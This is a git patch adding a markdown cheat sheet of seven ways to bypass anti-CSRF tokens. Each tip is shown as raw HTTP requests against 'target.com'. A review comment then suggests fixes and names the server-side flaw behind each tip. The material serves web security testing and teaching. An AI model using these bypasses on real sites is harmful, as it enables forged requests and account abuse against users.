From 1c09b8a9eb1c003e8f89b692408e124f3752888a Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+MD15@users.noreply.github.com> Date: Sun, 20 Sep 2020 00:04:29 +0700 Subject: [PATCH] Bypass CSRF [1] Create bypass CSRF tips and add 7 tips --- BypassCSRF.md | 103 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 103 insertions(+) create mode 100644 BypassCSRF.md diff --git a/BypassCSRF.md b/BypassCSRF.md new file mode 100644 index 0000000..f743375 --- /dev/null +++ b/BypassCSRF.md 
@@ -0,0 +1,103 @@ +# Bypass CSRF Token +1. Change single character +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaabaaaaaaaaaaa +``` + +2. Sending empty value of token +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token= +``` + +3. Changing POST / GET method +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 +Host: target.com +[...] +``` + +4. Remove the token from request +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456 +``` + +5. Use another user's valid token +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=ANOTHER_VALID_TOKEN +``` + +6. Try to decrypt hash +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=MTIzNDU2 +``` +MTIzNDU2 => 123456 with base64 + +7. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=vi802jg9f8akd9j123 +``` +When we register again, the request like this +``` +POST /register HTTP/1.1 +Host: target.com +[...] 
+ +username=dapos&password=123456&token=vi802jg9f8akd9j124 +``` +If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
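Review bot: the heading of tip 6 ("Try to decrypt hash") misdescribes what the example shows; "MTIzNDU2 => 123456 with base64" is plain base64 decoding of a predictable value, not decryption of a hash, so retitle it along the lines of "Decode the token and check whether it is predictable". In tip 7, "one of them remains static while the others one dynamic" and "the request like this" / "remain same" need grammar fixes ("one part stays static while the other changes", "the request looks like this", "remains the same"). The "Host: target.com" lines in every block use a real registrable domain; `example.com` (reserved for documentation) avoids pointing readers at a third party. Each tip would also be more useful as a checklist if it ended with the server-side defect it reveals, e.g. tip 2 and tip 4 indicate the server skips validation when the token is empty or absent, tip 3 that the check is only applied to POST, and tip 5 that the token is not bound to the requesting user's session, which is what a fix would need to address. Finally, the code fences carry no language tag; `http` would give the request snippets consistent highlighting.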